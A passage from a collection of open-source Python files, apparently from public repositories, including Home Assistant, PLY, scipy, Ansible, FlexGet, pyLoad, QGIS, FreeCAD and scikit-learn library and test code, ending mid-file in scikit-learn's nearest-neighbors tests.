"""Collection of helper methods. All containing methods are legacy helpers that should not be used by new components. Instead call the service directly. """ from homeassistant.components.image_processing import DOMAIN, SERVICE_SCAN from homeassistant.const import ATTR_ENTITY_ID from homeassistant.core import callback from homeassistant.loader import bind_hass @bind_hass def scan(hass, entity_id=None): """Force process of all cameras or given entity.""" hass.add_job(async_scan, hass, entity_id) @callback @bind_hass def async_scan(hass, entity_id=None): """Force process of all cameras or given entity.""" data = {ATTR_ENTITY_ID: entity_id} if entity_id else None hass.async_add_job(hass.services.async_call(DOMAIN, SERVICE_SCAN, data))
BellScurry/gem5-fault-injection
refs/heads/master
ext/ply/example/yply/yparse.py
165
# parser for Unix yacc-based grammars # # Author: David Beazley (dave@dabeaz.com) # Date : October 2, 2006 import ylex tokens = ylex.tokens from ply import * tokenlist = [] preclist = [] emit_code = 1 def p_yacc(p): '''yacc : defsection rulesection''' def p_defsection(p): '''defsection : definitions SECTION | SECTION''' p.lexer.lastsection = 1 print "tokens = ", repr(tokenlist) print print "precedence = ", repr(preclist) print print "# -------------- RULES ----------------" print def p_rulesection(p): '''rulesection : rules SECTION''' print "# -------------- RULES END ----------------" print_code(p[2],0) def p_definitions(p): '''definitions : definitions definition | definition''' def p_definition_literal(p): '''definition : LITERAL''' print_code(p[1],0) def p_definition_start(p): '''definition : START ID''' print "start = '%s'" % p[2] def p_definition_token(p): '''definition : toktype opttype idlist optsemi ''' for i in p[3]: if i[0] not in "'\"": tokenlist.append(i) if p[1] == '%left': preclist.append(('left',) + tuple(p[3])) elif p[1] == '%right': preclist.append(('right',) + tuple(p[3])) elif p[1] == '%nonassoc': preclist.append(('nonassoc',)+ tuple(p[3])) def p_toktype(p): '''toktype : TOKEN | LEFT | RIGHT | NONASSOC''' p[0] = p[1] def p_opttype(p): '''opttype : '<' ID '>' | empty''' def p_idlist(p): '''idlist : idlist optcomma tokenid | tokenid''' if len(p) == 2: p[0] = [p[1]] else: p[0] = p[1] p[1].append(p[3]) def p_tokenid(p): '''tokenid : ID | ID NUMBER | QLITERAL | QLITERAL NUMBER''' p[0] = p[1] def p_optsemi(p): '''optsemi : ';' | empty''' def p_optcomma(p): '''optcomma : ',' | empty''' def p_definition_type(p): '''definition : TYPE '<' ID '>' namelist optsemi''' # type declarations are ignored def p_namelist(p): '''namelist : namelist optcomma ID | ID''' def p_definition_union(p): '''definition : UNION CODE optsemi''' # Union declarations are ignored def p_rules(p): '''rules : rules rule | rule''' if len(p) == 2: rule = p[1] else: rule = p[2] # Print out a Python equivalent of this rule embedded = [ ] # Embedded actions (a mess) embed_count = 0 rulename = rule[0] rulecount = 1 for r in rule[1]: # r contains one of the rule possibilities print "def p_%s_%d(p):" % (rulename,rulecount) prod = [] prodcode = "" for i in range(len(r)): item = r[i] if item[0] == '{': # A code block if i == len(r) - 1: prodcode = item break else: # an embedded action embed_name = "_embed%d_%s" % (embed_count,rulename) prod.append(embed_name) embedded.append((embed_name,item)) embed_count += 1 else: prod.append(item) print " '''%s : %s'''" % (rulename, " ".join(prod)) # Emit code print_code(prodcode,4) print rulecount += 1 for e,code in embedded: print "def p_%s(p):" % e print " '''%s : '''" % e print_code(code,4) print def p_rule(p): '''rule : ID ':' rulelist ';' ''' p[0] = (p[1],[p[3]]) def p_rule2(p): '''rule : ID ':' rulelist morerules ';' ''' p[4].insert(0,p[3]) p[0] = (p[1],p[4]) def p_rule_empty(p): '''rule : ID ':' ';' ''' p[0] = (p[1],[[]]) def p_rule_empty2(p): '''rule : ID ':' morerules ';' ''' p[3].insert(0,[]) p[0] = (p[1],p[3]) def p_morerules(p): '''morerules : morerules '|' rulelist | '|' rulelist | '|' ''' if len(p) == 2: p[0] = [[]] elif len(p) == 3: p[0] = [p[2]] else: p[0] = p[1] p[0].append(p[3]) # print "morerules", len(p), p[0] def p_rulelist(p): '''rulelist : rulelist ruleitem | ruleitem''' if len(p) == 2: p[0] = [p[1]] else: p[0] = p[1] p[1].append(p[2]) def p_ruleitem(p): '''ruleitem : ID | QLITERAL | CODE | PREC''' p[0] = p[1] def p_empty(p): '''empty : ''' def p_error(p): pass yacc.yacc(debug=0) def print_code(code,indent): if not emit_code: return codelines = code.splitlines() for c in codelines: print "%s# %s" % (" "*indent,c)
perimosocordiae/scipy
refs/heads/master
scipy/signal/tests/mpsig.py
13
""" Some signal functions implemented using mpmath. """ try: import mpmath except ImportError: mpmath = None def _prod(seq): """Returns the product of the elements in the sequence `seq`.""" p = 1 for elem in seq: p *= elem return p def _relative_degree(z, p): """ Return relative degree of transfer function from zeros and poles. This is simply len(p) - len(z), which must be nonnegative. A ValueError is raised if len(p) < len(z). """ degree = len(p) - len(z) if degree < 0: raise ValueError("Improper transfer function. " "Must have at least as many poles as zeros.") return degree def _zpkbilinear(z, p, k, fs): """Bilinear transformation to convert a filter from analog to digital.""" degree = _relative_degree(z, p) fs2 = 2*fs # Bilinear transform the poles and zeros z_z = [(fs2 + z1) / (fs2 - z1) for z1 in z] p_z = [(fs2 + p1) / (fs2 - p1) for p1 in p] # Any zeros that were at infinity get moved to the Nyquist frequency z_z.extend([-1] * degree) # Compensate for gain change numer = _prod(fs2 - z1 for z1 in z) denom = _prod(fs2 - p1 for p1 in p) k_z = k * numer / denom return z_z, p_z, k_z.real def _zpklp2lp(z, p, k, wo=1): """Transform a lowpass filter to a different cutoff frequency.""" degree = _relative_degree(z, p) # Scale all points radially from origin to shift cutoff frequency z_lp = [wo * z1 for z1 in z] p_lp = [wo * p1 for p1 in p] # Each shifted pole decreases gain by wo, each shifted zero increases it. # Cancel out the net change to keep overall gain the same k_lp = k * wo**degree return z_lp, p_lp, k_lp def _butter_analog_poles(n): """ Poles of an analog Butterworth lowpass filter. This is the same calculation as scipy.signal.buttap(n) or scipy.signal.butter(n, 1, analog=True, output='zpk'), but mpmath is used, and only the poles are returned. """ poles = [-mpmath.exp(1j*mpmath.pi*k/(2*n)) for k in range(-n+1, n, 2)] return poles def butter_lp(n, Wn): """ Lowpass Butterworth digital filter design. This computes the same result as scipy.signal.butter(n, Wn, output='zpk'), but it uses mpmath, and the results are returned in lists instead of NumPy arrays. """ zeros = [] poles = _butter_analog_poles(n) k = 1 fs = 2 warped = 2 * fs * mpmath.tan(mpmath.pi * Wn / fs) z, p, k = _zpklp2lp(zeros, poles, k, wo=warped) z, p, k = _zpkbilinear(z, p, k, fs=fs) return z, p, k def zpkfreqz(z, p, k, worN=None): """ Frequency response of a filter in zpk format, using mpmath. This is the same calculation as scipy.signal.freqz, but the input is in zpk format, the calculation is performed using mpath, and the results are returned in lists instead of NumPy arrays. """ if worN is None or isinstance(worN, int): N = worN or 512 ws = [mpmath.pi * mpmath.mpf(j) / N for j in range(N)] else: ws = worN h = [] for wk in ws: zm1 = mpmath.exp(1j * wk) numer = _prod([zm1 - t for t in z]) denom = _prod([zm1 - t for t in p]) hk = k * numer / denom h.append(hk) return ws, h
Versent/ansible
refs/heads/devel
test/units/playbook/test_block.py
228
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from ansible.playbook.block import Block from ansible.playbook.task import Task from ansible.compat.tests import unittest class TestBlock(unittest.TestCase): def setUp(self): pass def tearDown(self): pass def test_construct_empty_block(self): b = Block() def test_construct_block_with_role(self): pass def test_load_block_simple(self): ds = dict( block = [], rescue = [], always = [], #otherwise = [], ) b = Block.load(ds) self.assertEqual(b.block, []) self.assertEqual(b.rescue, []) self.assertEqual(b.always, []) # not currently used #self.assertEqual(b.otherwise, []) def test_load_block_with_tasks(self): ds = dict( block = [dict(action='block')], rescue = [dict(action='rescue')], always = [dict(action='always')], #otherwise = [dict(action='otherwise')], ) b = Block.load(ds) self.assertEqual(len(b.block), 1) self.assertIsInstance(b.block[0], Task) self.assertEqual(len(b.rescue), 1) self.assertIsInstance(b.rescue[0], Task) self.assertEqual(len(b.always), 1) self.assertIsInstance(b.always[0], Task) # not currently used #self.assertEqual(len(b.otherwise), 1) #self.assertIsInstance(b.otherwise[0], Task) def test_load_implicit_block(self): ds = [dict(action='foo')] b = Block.load(ds) self.assertEqual(len(b.block), 1) self.assertIsInstance(b.block[0], Task)
Antiun/yelizariev-saas
refs/heads/8.0
saas_server/models/res_config.py
8
from openerp import models, fields class SaasServerWizard(models.TransientModel): _name = 'saas_server.config.settings' _inherit = 'res.config.settings'
jiahaoliang/group-based-policy
refs/heads/lbaasv2-mitaka-pull-request
gbpservice/neutron/tests/unit/nfp/configurator/lib/test_filter.py
1
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import filter_base from gbpservice.nfp.configurator.lib import data_filter import mock """Test class to test data_filter.py using unittest framework """ class FilterTest(filter_base.BaseTestCase): def __init__(self, *args, **kwargs): super(FilterTest, self).__init__(*args, **kwargs) def setUp(self): """Prepare setup for every test case. """ self.context = {} self.filter_obj = data_filter.Filter(None, None) def tearDown(self): """ Reset values after test case execution. """ self.context = {} def _make_test(self, context, method, **filters): """ To reduce the boilerplate. """ retval = self.filter_obj.call(self.context, self.filter_obj.make_msg(method, **filters)) return retval def _make_vpn_service_context(self): """Make the context for the vpn service Returns: vpn service context """ service_info = self._test_get_vpn_info() self.context['service_info'] = service_info return self.context def _make_lb_service_context(self): """Make the context for the lb service Returns: lb service context """ service_info = self._test_get_lb_info() self.context['service_info'] = service_info return self.context def _make_fw_service_context(self): """Make the context for the fw service Returns: fw service context """ service_info = self._test_get_fw_info() self.context['service_info'] = service_info return self.context def test_make_msg(self): """Test make_msg() of data_filter.py """ retval = self.filter_obj.make_msg('get_logical_device', pool_id=self.pools[0]['id']) self.assertEqual(retval, {'method': 'get_logical_device', 'args': {'pool_id': self.pools[0]['id']}}) def test_make_msg_empty(self): """Test make_msg() of data_filter.py """ retval = self.filter_obj.make_msg('get_logical_device') self.assertEqual(retval, {'args': {}, 'method': 'get_logical_device'}) def test_call(self): """Test call() of data_filter.py """ with mock.patch.object(self.filter_obj, "call") as call_mock: call_mock.return_value = True retval = self._make_test(self._make_lb_service_context(), 'get_logical_device', pool_id=[self.pools[0]['id']]) self.assertTrue(retval) def test_get_vpn_service_with_tenantid(self): """Test get_vpn_services() of data_filter.py by passing only tenant_id in filters """ retval = self._make_test(self._make_vpn_service_context(), 'get_vpn_services', filters=( {'tenant_id': [self.vpnservices[0]['tenant_id']]})) self.assertEqual(retval, [self.vpnservices[0], self.vpnservices[1]]) def test_get_vpn_service_with_ids(self): """Test get_vpn_services() of data_filter.py by passing vpn service ids in filters """ retval = self._make_test(self._make_vpn_service_context(), 'get_vpn_services', ids=[self.vpnservices[0]['id'], self.vpnservices[1]['id']]) self.assertEqual(retval, [self.vpnservices[0], self.vpnservices[1]]) def test_get_ipsec_conns(self): """Test get_ipsec_conns() of data_filter.py """ retval = self._make_test( self._make_vpn_service_context(), 'get_ipsec_conns', tenant_id=[self.ipsec_site_connections[0]['tenant_id']], peer_address=[self.ipsec_site_connections[0]['peer_address']]) self.assertEqual(retval, self.ipsec_site_connections) def test_get_logical_device(self): """Test get_logical_device() of data_filter.py """ retval = self._make_test(self._make_lb_service_context(), 'get_logical_device', pool_id=self.pools[0]['id']) self.ports[0]['fixed_ips'] = self.subnets[1] self.vips[0]['port'] = self.ports[0] expected = {'pool': self.pools[0], 'vip': self.vips[0], 'members': self.members[0], 'healthmonitors': {} } self.assertNotEqual(retval, expected) def test_get_vpn_servicecontext_ipsec_service_type(self): """Test get_vpn_servicecontext() of data_filter.py based on ipsec service type """ service_info = self._test_get_vpn_info() self.context['service_info'] = service_info retval = self.filter_obj._get_vpn_servicecontext( self.context, {'tenant_id': self.vpnservices[0]['tenant_id'], 'vpnservice_id': self.vpnservices[0]['id'], 'ipsec_site_connections': self.ipsec_site_connections[0]['id']}) expected = {'service': self.vpnservices[0], 'siteconns': [{'connection': self.ipsec_site_connections[0], 'ikepolicy': self.ikepolicies[0], 'ipsecpolicy': self.ipsecpolicies[0] }]} self.assertEqual(retval, [expected]) def test_get_vpn_servicecontext_ipsec_service_type_with_tenantid(self): """Test get_vpn_servicecontext() of data_filter.py based on ipsec service type and tenant_id """ service_info = self._test_get_vpn_info() self.context['service_info'] = service_info retval = self.filter_obj._get_vpn_servicecontext( self.context, {'tenant_id': self.vpnservices[0]['tenant_id'], }) expected = {'service': self.vpnservices[0], 'siteconns': [{'connection': self.ipsec_site_connections[0], 'ikepolicy': self.ikepolicies[0], 'ipsecpolicy': self.ipsecpolicies[0] }]} self.assertEqual(retval, [expected])
Pretagonist/Flexget
refs/heads/develop
tests/test_pluginapi.py
2
from __future__ import unicode_literals, division, absolute_import import os import glob import pytest from flexget import plugin, plugins from flexget.event import event, fire_event class TestPluginApi(object): """ Contains plugin api related tests """ config = 'tasks: {}' def test_unknown_plugin(self): with pytest.raises(plugin.DependencyError): plugin.get_plugin_by_name('nonexisting_plugin') def test_no_dupes(self): plugin.load_plugins() assert plugin.PluginInfo.dupe_counter == 0, "Duplicate plugin names, see log" def test_load(self): plugin.load_plugins() plugin_path = os.path.dirname(plugins.__file__) plugin_modules = set(os.path.basename(i) for k in ("/*.py", "/*/*.py") for i in glob.glob(plugin_path + k)) assert len(plugin_modules) >= 10, "Less than 10 plugin modules looks fishy" # Hmm, this test isn't good, because we have plugin modules that don't register a class (like cli ones) # and one module can load multiple plugins TODO: Maybe consider some replacement # assert len(plugin.plugins) >= len(plugin_modules) - 1, "Less plugins than plugin modules" def test_register_by_class(self, execute_task): class TestPlugin(object): pass class Oneword(object): pass class TestHTML(object): pass assert 'test_plugin' not in plugin.plugins @event('plugin.register') def rp(): plugin.register(TestPlugin, api_ver=2) plugin.register(Oneword, api_ver=2) plugin.register(TestHTML, api_ver=2) # Call load_plugins again to register our new plugins plugin.load_plugins() assert 'test_plugin' in plugin.plugins assert 'oneword' in plugin.plugins assert 'test_html' in plugin.plugins class TestExternalPluginLoading(object): _config = """ tasks: ext_plugin: external_plugin: yes """ @pytest.yield_fixture() def config(self, request): os.environ['FLEXGET_PLUGIN_PATH'] = request.fspath.dirpath().join('external_plugins').strpath plugin.load_plugins() # fire the config register event again so that task schema is rebuilt with new plugin fire_event('config.register') yield self._config del os.environ['FLEXGET_PLUGIN_PATH'] def test_external_plugin_loading(self, execute_task): # TODO: This isn't working because calling load_plugins again doesn't cause the schema for tasks to regenerate task = execute_task('ext_plugin') assert task.find_entry(title='test entry'), 'External plugin did not create entry'
nafex/pyload
refs/heads/stable
module/plugins/accounts/MegaRapidCz.py
6
# -*- coding: utf-8 -*- import re import time from module.plugins.internal.Account import Account class MegaRapidCz(Account): __name__ = "MegaRapidCz" __type__ = "account" __version__ = "0.38" __status__ = "testing" __description__ = """MegaRapid.cz account plugin""" __license__ = "GPLv3" __authors__ = [("MikyWoW", "mikywow@seznam.cz"), ("zoidberg", "zoidberg@mujmail.cz")] login_timeout = 60 LIMITDL_PATTERN = ur'<td>Max. počet paralelních stahování: </td><td>(\d+)' VALID_UNTIL_PATTERN = ur'<td>Paušální stahování aktivní. Vyprší </td><td><strong>(.*?)</strong>' TRAFFIC_LEFT_PATTERN = r'<tr><td>Kredit</td><td>(.*?) GiB' def grab_info(self, user, password, data, req): htmll = self.load("http://megarapid.cz/mujucet/") m = re.search(self.LIMITDL_PATTERN, htmll) if m: data = self.get_data(user) data['options']['limitDL'] = [int(m.group(1))] m = re.search(self.VALID_UNTIL_PATTERN, htmll) if m: validuntil = time.mktime(time.strptime(m.group(1), "%d.%m.%Y - %H:%M")) return {'premium': True, 'trafficleft': -1, 'validuntil': validuntil} m = re.search(self.TRAFFIC_LEFT_PATTERN, htmll) if m: trafficleft = float(m.group(1)) * (1 << 20) return {'premium': True, 'trafficleft': trafficleft, 'validuntil': -1} return {'premium': False, 'trafficleft': None, 'validuntil': None} def login(self, user, password, data, req): html = self.load("http://megarapid.cz/prihlaseni/") if "Heslo:" in html: start = html.index('id="inp_hash" name="hash" value="') html = html[start + 33:] hashes = html[0:32] html = self.load("https://megarapid.cz/prihlaseni/", post={'hash' : hashes, 'login' : user, 'pass1' : password, 'remember': 1, 'sbmt' : u"Přihlásit"})
ahuarte47/QGIS
refs/heads/master
python/plugins/processing/algs/gdal/translate.py
15
# -*- coding: utf-8 -*- """ *************************************************************************** translate.py --------------------- Date : August 2012 Copyright : (C) 2012 by Victor Olaya Email : volayaf at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Victor Olaya' __date__ = 'August 2012' __copyright__ = '(C) 2012, Victor Olaya' import os from qgis.PyQt.QtGui import QIcon from qgis.core import (QgsRasterFileWriter, QgsProcessingException, QgsProcessingParameterDefinition, QgsProcessingParameterRasterLayer, QgsProcessingParameterNumber, QgsProcessingParameterBoolean, QgsProcessingParameterString, QgsProcessingParameterEnum, QgsProcessingParameterCrs, QgsProcessingParameterRasterDestination) from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm from processing.algs.gdal.GdalUtils import GdalUtils pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0] class translate(GdalAlgorithm): INPUT = 'INPUT' TARGET_CRS = 'TARGET_CRS' NODATA = 'NODATA' COPY_SUBDATASETS = 'COPY_SUBDATASETS' OPTIONS = 'OPTIONS' EXTRA = 'EXTRA' DATA_TYPE = 'DATA_TYPE' OUTPUT = 'OUTPUT' def __init__(self): super().__init__() def initAlgorithm(self, config=None): self.TYPES = [self.tr('Use Input Layer Data Type'), 'Byte', 'Int16', 'UInt16', 'UInt32', 'Int32', 'Float32', 'Float64', 'CInt16', 'CInt32', 'CFloat32', 'CFloat64'] self.addParameter(QgsProcessingParameterRasterLayer(self.INPUT, self.tr('Input layer'))) self.addParameter(QgsProcessingParameterCrs(self.TARGET_CRS, self.tr('Override the projection for the output file'), defaultValue=None, optional=True)) self.addParameter(QgsProcessingParameterNumber(self.NODATA, self.tr('Assign a specified nodata value to output bands'), type=QgsProcessingParameterNumber.Double, defaultValue=None, optional=True)) self.addParameter(QgsProcessingParameterBoolean(self.COPY_SUBDATASETS, self.tr('Copy all subdatasets of this file to individual output files'), defaultValue=False)) options_param = QgsProcessingParameterString(self.OPTIONS, self.tr('Additional creation options'), defaultValue='', optional=True) options_param.setFlags(options_param.flags() | QgsProcessingParameterDefinition.FlagAdvanced) options_param.setMetadata({ 'widget_wrapper': { 'class': 'processing.algs.gdal.ui.RasterOptionsWidget.RasterOptionsWidgetWrapper'}}) self.addParameter(options_param) extra_param = QgsProcessingParameterString(self.EXTRA, self.tr('Additional command-line parameters'), defaultValue=None, optional=True) extra_param.setFlags(extra_param.flags() | QgsProcessingParameterDefinition.FlagAdvanced) self.addParameter(extra_param) dataType_param = QgsProcessingParameterEnum(self.DATA_TYPE, self.tr('Output data type'), self.TYPES, allowMultiple=False, defaultValue=0) dataType_param.setFlags(dataType_param.flags() | QgsProcessingParameterDefinition.FlagAdvanced) self.addParameter(dataType_param) self.addParameter(QgsProcessingParameterRasterDestination(self.OUTPUT, self.tr('Converted'))) def name(self): return 'translate' def displayName(self): return self.tr('Translate (convert format)') def group(self): return self.tr('Raster conversion') def groupId(self): return 'rasterconversion' def icon(self): return QIcon(os.path.join(pluginPath, 'images', 'gdaltools', 'translate.png')) def commandName(self): return 'gdal_translate' def getConsoleCommands(self, parameters, context, feedback, executing=True): inLayer = self.parameterAsRasterLayer(parameters, self.INPUT, context) if inLayer is None: raise QgsProcessingException(self.invalidRasterError(parameters, self.INPUT)) out = self.parameterAsOutputLayer(parameters, self.OUTPUT, context) self.setOutputValue(self.OUTPUT, out) if self.NODATA in parameters and parameters[self.NODATA] is not None: nodata = self.parameterAsDouble(parameters, self.NODATA, context) else: nodata = None arguments = [] crs = self.parameterAsCrs(parameters, self.TARGET_CRS, context) if crs.isValid(): arguments.append('-a_srs') arguments.append(GdalUtils.gdal_crs_string(crs)) if nodata is not None: arguments.append('-a_nodata') arguments.append(nodata) if self.parameterAsBoolean(parameters, self.COPY_SUBDATASETS, context): arguments.append('-sds') data_type = self.parameterAsEnum(parameters, self.DATA_TYPE, context) if data_type: arguments.append('-ot ' + self.TYPES[data_type]) arguments.append('-of') arguments.append(QgsRasterFileWriter.driverForExtension(os.path.splitext(out)[1])) options = self.parameterAsString(parameters, self.OPTIONS, context) if options: arguments.extend(GdalUtils.parseCreationOptions(options)) if self.EXTRA in parameters and parameters[self.EXTRA] not in (None, ''): extra = self.parameterAsString(parameters, self.EXTRA, context) arguments.append(extra) arguments.append(inLayer.source()) arguments.append(out) return [self.commandName(), GdalUtils.escapeAndJoin(arguments)]
kkoksvik/FreeCAD
refs/heads/master
src/Mod/Drawing/Init.py
33
# FreeCAD init script of the Image module # (c) 2001 Juergen Riegel #*************************************************************************** #* (c) Juergen Riegel (juergen.riegel@web.de) 2002 * #* * #* This file is part of the FreeCAD CAx development system. * #* * #* This program is free software; you can redistribute it and/or modify * #* it under the terms of the GNU Lesser General Public License (LGPL) * #* as published by the Free Software Foundation; either version 2 of * #* the License, or (at your option) any later version. * #* for detail see the LICENCE text file. * #* * #* FreeCAD is distributed in the hope that it will be useful, * #* but WITHOUT ANY WARRANTY; without even the implied warranty of * #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * #* GNU Lesser General Public License for more details. * #* * #* You should have received a copy of the GNU Library General Public * #* License along with FreeCAD; if not, write to the Free Software * #* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * #* USA * #* * #* Juergen Riegel 2002 * #***************************************************************************/
jjx02230808/project0223
refs/heads/master
sklearn/neighbors/tests/test_neighbors.py
23
from itertools import product import pickle import numpy as np from scipy.sparse import (bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dok_matrix, lil_matrix) from sklearn import metrics from sklearn.model_selection import train_test_split from sklearn.model_selection import cross_val_score from sklearn.utils.testing import assert_array_almost_equal from sklearn.utils.testing import assert_array_equal from sklearn.utils.testing import assert_raises from sklearn.utils.testing import assert_equal from sklearn.utils.testing import assert_true from sklearn.utils.testing import assert_warns from sklearn.utils.testing import ignore_warnings from sklearn.utils.validation import check_random_state from sklearn.metrics.pairwise import pairwise_distances from sklearn import neighbors, datasets rng = np.random.RandomState(0) # load and shuffle iris dataset iris = datasets.load_iris() perm = rng.permutation(iris.target.size) iris.data = iris.data[perm] iris.target = iris.target[perm] # load and shuffle digits digits = datasets.load_digits() perm = rng.permutation(digits.target.size) digits.data = digits.data[perm] digits.target = digits.target[perm] SPARSE_TYPES = (bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dok_matrix, lil_matrix) SPARSE_OR_DENSE = SPARSE_TYPES + (np.asarray,) ALGORITHMS = ('ball_tree', 'brute', 'kd_tree', 'auto') P = (1, 2, 3, 4, np.inf) # Filter deprecation warnings. neighbors.kneighbors_graph = ignore_warnings(neighbors.kneighbors_graph) neighbors.radius_neighbors_graph = ignore_warnings( neighbors.radius_neighbors_graph) def _weight_func(dist): """ Weight function to replace lambda d: d ** -2. The lambda function is not valid because: if d==0 then 0^-2 is not valid. """ # Dist could be multidimensional, flatten it so all values # can be looped with np.errstate(divide='ignore'): retval = 1. / dist return retval ** 2 def test_unsupervised_kneighbors(n_samples=20, n_features=5, n_query_pts=2, n_neighbors=5): # Test unsupervised neighbors methods X = rng.rand(n_samples, n_features) test = rng.rand(n_query_pts, n_features) for p in P: results_nodist = [] results = [] for algorithm in ALGORITHMS: neigh = neighbors.NearestNeighbors(n_neighbors=n_neighbors, algorithm=algorithm, p=p) neigh.fit(X) results_nodist.append(neigh.kneighbors(test, return_distance=False)) results.append(neigh.kneighbors(test, return_distance=True)) for i in range(len(results) - 1): assert_array_almost_equal(results_nodist[i], results[i][1]) assert_array_almost_equal(results[i][0], results[i + 1][0]) assert_array_almost_equal(results[i][1], results[i + 1][1]) def test_unsupervised_inputs(): # test the types of valid input into NearestNeighbors X = rng.random_sample((10, 3)) nbrs_fid = neighbors.NearestNeighbors(n_neighbors=1) nbrs_fid.fit(X) dist1, ind1 = nbrs_fid.kneighbors(X) nbrs = neighbors.NearestNeighbors(n_neighbors=1) for input in (nbrs_fid, neighbors.BallTree(X), neighbors.KDTree(X)): nbrs.fit(input) dist2, ind2 = nbrs.kneighbors(X) assert_array_almost_equal(dist1, dist2) assert_array_almost_equal(ind1, ind2) def test_precomputed(random_state=42): """Tests unsupervised NearestNeighbors with a distance matrix.""" # Note: smaller samples may result in spurious test success rng = np.random.RandomState(random_state) X = rng.random_sample((10, 4)) Y = rng.random_sample((3, 4)) DXX = metrics.pairwise_distances(X, metric='euclidean') DYX = metrics.pairwise_distances(Y, X, metric='euclidean') for method in ['kneighbors']: # TODO: also test radius_neighbors, but requires different assertion # As a feature matrix (n_samples by n_features) nbrs_X = neighbors.NearestNeighbors(n_neighbors=3) nbrs_X.fit(X) dist_X, ind_X = getattr(nbrs_X, method)(Y) # As a dense distance matrix (n_samples by n_samples) nbrs_D = neighbors.NearestNeighbors(n_neighbors=3, algorithm='brute', metric='precomputed') nbrs_D.fit(DXX) dist_D, ind_D = getattr(nbrs_D, method)(DYX) assert_array_almost_equal(dist_X, dist_D) assert_array_almost_equal(ind_X, ind_D) # Check auto works too nbrs_D = neighbors.NearestNeighbors(n_neighbors=3, algorithm='auto', metric='precomputed') nbrs_D.fit(DXX) dist_D, ind_D = getattr(nbrs_D, method)(DYX) assert_array_almost_equal(dist_X, dist_D) assert_array_almost_equal(ind_X, ind_D) # Check X=None in prediction dist_X, ind_X = getattr(nbrs_X, method)(None) dist_D, ind_D = getattr(nbrs_D, method)(None) assert_array_almost_equal(dist_X, dist_D) assert_array_almost_equal(ind_X, ind_D) # Must raise a ValueError if the matrix is not of correct shape assert_raises(ValueError, getattr(nbrs_D, method), X) target = np.arange(X.shape[0]) for Est in (neighbors.KNeighborsClassifier, neighbors.RadiusNeighborsClassifier, neighbors.KNeighborsRegressor, neighbors.RadiusNeighborsRegressor): print(Est) est = Est(metric='euclidean') est.radius = est.n_neighbors = 1 pred_X = est.fit(X, target).predict(Y) est.metric = 'precomputed' pred_D = est.fit(DXX, target).predict(DYX) assert_array_almost_equal(pred_X, pred_D) def test_precomputed_cross_validation(): # Ensure array is split correctly rng = np.random.RandomState(0) X = rng.rand(20, 2) D = pairwise_distances(X, metric='euclidean') y = rng.randint(3, size=20) for Est in (neighbors.KNeighborsClassifier, neighbors.RadiusNeighborsClassifier, neighbors.KNeighborsRegressor, neighbors.RadiusNeighborsRegressor): metric_score = cross_val_score(Est(), X, y) precomp_score = cross_val_score(Est(metric='precomputed'), D, y) assert_array_equal(metric_score, precomp_score) def test_unsupervised_radius_neighbors(n_samples=20, n_features=5, n_query_pts=2, radius=0.5, random_state=0): # Test unsupervised radius-based query rng = np.random.RandomState(random_state) X = rng.rand(n_samples, n_features) test = rng.rand(n_query_pts, n_features) for p in P: results = [] for algorithm in ALGORITHMS: neigh = neighbors.NearestNeighbors(radius=radius, algorithm=algorithm, p=p) neigh.fit(X) ind1 = neigh.radius_neighbors(test, return_distance=False) # sort the results: this is not done automatically for # radius searches dist, ind = neigh.radius_neighbors(test, return_distance=True) for (d, i, i1) in zip(dist, ind, ind1): j = d.argsort() d[:] = d[j] i[:] = i[j] i1[:] = i1[j] results.append((dist, ind)) assert_array_almost_equal(np.concatenate(list(ind)), np.concatenate(list(ind1))) for i in range(len(results) - 1): assert_array_almost_equal(np.concatenate(list(results[i][0])), np.concatenate(list(results[i + 1][0]))), assert_array_almost_equal(np.concatenate(list(results[i][1])), np.concatenate(list(results[i + 1][1]))) def test_kneighbors_classifier(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test k-neighbors classification rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) y_str = y.astype(str) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) knn.fit(X, y) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y[:n_test_pts]) # Test prediction with y_str knn.fit(X, y_str) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y_str[:n_test_pts]) def test_kneighbors_classifier_float_labels(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test k-neighbors classification rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors) knn.fit(X, y.astype(np.float)) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y[:n_test_pts]) def test_kneighbors_classifier_predict_proba(): # Test 